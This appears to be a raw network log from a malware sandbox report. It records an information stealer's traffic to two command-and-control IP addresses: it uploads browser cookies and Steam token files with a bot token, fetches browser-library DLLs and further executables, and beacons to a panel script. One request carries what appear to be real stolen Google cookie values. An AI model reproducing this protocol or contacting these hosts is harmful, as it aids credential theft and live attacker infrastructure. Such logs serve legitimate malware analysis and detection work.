Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="message"fplugins------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 85.28.47.31Content-Length: 5627Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCFBKFCFCBGDGIEGHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 2d 2d 0d 0a Data Ascii: ------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="file"------CGCFCFBKFCFCBGDGIEGH--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 85.28.47.31Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wallets------DGIJEGHDAECAKECAFCAK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="message"ybncbhylepme------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="message"files------GIEHJDHCBAEHJJJKKFID--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: 